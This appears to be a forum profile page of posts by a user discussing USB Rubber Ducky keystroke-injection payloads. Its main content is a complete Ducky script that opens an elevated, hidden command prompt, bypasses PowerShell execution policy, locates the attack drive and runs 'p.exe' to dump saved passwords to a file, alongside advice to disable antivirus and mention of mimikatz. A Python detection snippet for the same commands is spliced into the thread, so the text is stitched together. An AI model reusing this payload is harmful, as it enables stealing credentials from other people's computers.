Posts posted by jes

  1. @Zer0Co0l Thanks for that. I'll search for ducky android payloads. Do you have any links on those that you can share?

    Sorry, I didn't mean to be rude, apologies. However, the forums are also supposed to have valuable information, so if you guys don't know a way to accomplish something, don't just say, this absolutely cannot be done, that's not how a hacker's mind should work.

    The ducky is a keyboard. Usually every OS has a way of navigating around the system just by using a keyboard (no need for a mouse or fingers for touching), so I was wondering if there are any good Android payloads that do this.

     

  2. On 12/13/2016 at 11:37 AM, barry99705 said:

    It would have to be phone specific.  Most manufacturers have their own spin on the gui, and the ducky only acts as a keyboard, no mouse(touch).  You'll also not be able to open a shell, since most android phones don't have that capability without an additional app already installed.  I'm not even sure if it's possible.

    Instead of shutting down opinions right and left, you can just say you don't know or can't think of a way ;) or not say anything at all

  3. 15 hours ago, authorityfinger said:

    Lol, I was gonna demonstrate this to my friend, but his AV (avast) detected p.exe as a trojan and deleted it :(

    Ha yea, it gets caught by Antivirus. You have to disable them before inserting the ducky. Then you're fine.

  4. Here is a payload that will run the p.exe using command prompt instead of powershell...

    I wanted this because not all computers have powershell enabled but they all have command prompt ;)

    DELAY 1200
    GUI R
    DELAY 300
    STRING powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"
    DELAY 200
    ENTER
    DELAY 500
    ALT y
    DELAY 100
    LEFTARROW
    DELAY 200
    DELETE
    DELAY 200
    STRING mode con lines=1 cols=18
    DELAY 80
    ENTER
    DELAY 80
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "QUACK"') do @set duck=%d
    DELAY 250
    ENTER
    DELAY 200
    STRING %duck%
    ENTER
    DELAY 150
    STRING p.exe /stext pass.txt
    DELAY 100
    ENTER
    DELAY 2000
    STRING exit
    DELAY 80
    ENTER

    I'm not 100% sure why I need the LEFTARROW or DELETE commands. I'm thinking of taking them out, but I also grabbed portions of this from elsewhere of course and they were there.

    Open to suggestions.
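
For defenders, the command lines typed by the payload above can be matched in process-creation logs and correlated per host. This is an added example, not part of the original post: the event tuples, host names and rule names are constructed, and the `cmd.exe /c` wrapper on the second sample line is an assumption about how the `for /f` lookup appears in a log.

```python
import re
from collections import defaultdict

# Patterns taken from the command lines typed by the payload in the post above.
RULES = {
    "ps_bypass_elevated_cmd": re.compile(
        r"powershell(\.exe)?\b.*-exec\w*\s+bypass.*start-process\s+cmd.*-verb\s+runas", re.I),
    "volume_label_lookup": re.compile(
        r"wmic\s+volume\s+get\s+driveletter.*\|\s*findstr", re.I),
    "stext_dump_to_file": re.compile(r"\s/stext\s+\S+\.txt\b", re.I),
}

# Constructed sample events: (epoch seconds, host, process command line).
SAMPLE_EVENTS = [
    (1000, "WS01", 'powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs"'),
    (1003, "WS01", 'cmd.exe /c wmic volume get driveletter, label|findstr "QUACK"'),
    (1005, "WS01", "p.exe /stext pass.txt"),
    (1010, "WS02", "powershell -NoProfile -File C:\\scripts\\backup.ps1"),
    (5000, "WS03", "wmic volume get driveletter, label"),
]

def match_rules(cmdline):
    """Names of all rules whose pattern occurs in one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def detect(events, window=30, threshold=2):
    """Return {host: sorted rule names} for hosts where at least `threshold`
    distinct rules fire within `window` seconds of each other."""
    hits = defaultdict(list)
    for ts, host, cmdline in events:
        for rule in match_rules(cmdline):
            hits[host].append((ts, rule))
    alerts = {}
    for host, host_hits in hits.items():
        host_hits.sort()
        for start_ts, _ in host_hits:
            # Distinct rules seen in the window opening at this hit.
            in_window = {r for ts, r in host_hits if 0 <= ts - start_ts <= window}
            if len(in_window) >= threshold:
                alerts[host] = sorted(in_window)
                break
    return alerts

if __name__ == "__main__":
    for host, rules in detect(SAMPLE_EVENTS).items():
        print(host, rules)
```

Requiring two or more distinct rules within a short window keeps a lone `wmic` query or an ordinary PowerShell script from alerting, while the rapid sequence produced by keystroke injection still does.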

  5. On 2016-12-08 at 6:42 PM, Mr.X said:

    Your version doesn't bypass the running scripts. I get something like: running scripts is disabled on this machine. Which means it can't execute mimikatz script. Did you fix that yet?

    I got the same error for whiterabbit.ps1
